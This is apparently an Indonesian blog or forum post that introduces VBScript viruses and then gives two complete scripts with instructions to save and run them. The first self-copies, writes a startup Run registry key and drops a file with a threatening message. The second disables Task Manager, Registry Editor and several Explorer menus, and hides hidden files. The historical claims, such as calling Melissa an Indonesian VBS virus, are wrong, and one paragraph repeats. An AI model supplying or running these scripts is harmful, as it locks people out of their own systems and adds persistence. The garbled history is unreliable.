Akhir" ni ane agak terobsesi mayang namanya virus. jadi pengen bahas virus nih, setahu ane, virus paling sederhana tu ya virus vbscript? apa ya virusvbscript tu?
- berupa file berakhiran [dot]vbs
- dibuat dengan bahasa BASIC
- standarnya, dijalankan oleh wscript.exe di sistem berbasis windows
- virus yang 'menggantikan' virus BAT, file dengan ekstensi [dot]bat. yaitu virus dengan orientasi batch. berarti pengerjaan instruksi program secara batch (satu-satu) tidak ada yang prosedural.
- virus yang 'ngetrend' karena ulah Onel de Gusman (Philipina) membuat virus VBS/LoveLetter-nya atau virus I Love You
- Makin 'ngetrend' lagi setelah virus maker-virus maker indonesia membuat virus VBS/Melissa, yang sempat menyebar luas. Dan juga virus VBS/Mella yang dideteksi oleh AntiVirus dengan nama palindromnya: "VBS/alleM"
setelah melihat ciri-ciri vbsdiatas,
ane pengen menyampaikan sesuatutentang "Apa itu Virus"
- Istilah virus diadopsi dari istilah biologi. virus dalam biologi pasti tau...
- dapat "berkembang biak" sendiri
- dapat "menginfeksi" atau "menumpang" ke file lain dengan cara mengisi awal, tengah, atau akhir dari struktur file korban dengan bit-bit virus. masih ingat Kspool? atau beberapa AV menyebutnya BackDoor? virus tersebut "menumpang" pada file [dot]doc, dll
- virus yang "baik" adalah virus yang dapat "membela diri". bisa saja dengan cara menyembunyikan file virus, sampai menutup Task Manager, Regedit, dsb...
- Virus komputer itu LOGIC, dan hasil dari pikiran manusia yang tidak bertanggung jawab. virus bukan berbentuk "fisik" seperti virus Biologi. jadi jangan takut dengan komp yang terkena virus, apalagi sampai menggunakan masker segala , hehehehehehe :)
Ini ane berikan contoh script filevbs yg sederhana (UNTUK DIPELAJARI) jangan disalah gunakan ya?
copy semua script dibawah ini kenotepad. trus save dengan ekstensi *.vbs
setfso=createobject("scripting.filesystemobject")
'buat file system object peng-handlefile
set reg=createobject("wscript.shell")
'reg sbg paramater untukmengeksekusi script
setfile=fso.getfile(wscript.scriptfullname)
'fso digunakan, untuk mengambil file.vbs yang di-klik
file.copy "D:\sincan.vbs"
'var file di-copy ke drive D. virusmulai nyebar =P
setnfile=fso.createtextfile("c:/kucing.vbs")
'fso digunakan lagi, untuk membuatfile baru di C, bernama kucing.vbs
nfile.write "msgbox"&chr(100) &"Anda telah mengaktifkan virus dalam komputer ini,jangan panik atau setres, karena data anda akan segera dihapus :) "&chr(100)
'file kucing.vbs di tulisi scriptoleh file yang scriptnya sedang anda baca ini
reg.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kucing","c:\kucing.vbs"
'menulis registry, agar file virusdieksekusi otomatis oleh windows saat startup
Ada yg bingung? pelajari dulu.nantinya, kalau sudah di-klik, akan ada file bernama kucing.vbs di drive Canda. Coba kucing.vbs di klik, maka akan muncul msgbox dengan pesan " Anda telah mengaktifkan virus dalam komputerini, jangan panik atau setres, karena data anda akan segera dihapus :) ".message box itu akan selalu muncul ketika windows anda dijalankan. Coba andabayangkan jika kucing.vbs berisi script yang memerintahkan komp anda untukshutdown? maka komp anda akan shutdown selamanya ketika PC dijalankan :)
Ada yg bingung? pelajari dulu.nantinya, kalau sudah di-klik, akan ada file bernama kucing.vbs di drive Canda. Coba kucing.vbs di klik, maka akan muncul msgbox dengan pesan " Anda telah mengaktifkan virus dalam komputerini, jangan panik atau setres, karena data anda akan segera dihapus :) ".message box itu akan selalu muncul ketika windows anda dijalankan. Coba andabayangkan jika kucing.vbs berisi script yang memerintahkan komp anda untukshutdown? maka komp anda akan shutdown selamanya ketika PC dijalankan :)
ini ada script lagi buat dipelajari:
‘kode ini berfungsi untuk meneruskan ke kode berikutnya jikaterjadi Error. Ini sering digunakan oleh para pembuat virus.
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
‘ berfungsi untuk mendisable "Registry Editor" dan"Task Manager"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions","1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind","1", "REG_DWORD"
‘ Ini digunakan untuk menghilangkan menu "FolderOptions", "Run", dan "Find"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
‘ Berfungsi untuk tidak menampilkan menu Klik Kanan.
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "1", "REG_DWORD"
‘ Tidak menampilkan "File Hidden" pada"Explorer"
maka akan tercipta script sepertiberikut ini:
On Error Resume Next
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "1", "REG_DWORD"
Kemudian simpan dengan jenis vbs(*.vbs)
Caranya: klik File, pilih Save As,pada File Name ketik "Virus.vbs" (tanpa tanda petik), kemudian klikSave.
Selesai. . .
*) SEGALA APA YANG TERJADI PADAKOMPUTER ANDA, ANDA SENDIRI YANG BERTANGGUNG JAWAB,….
www.tendollarclick.com/index.php?ref=gonjong
View the Original article
Posting Komentar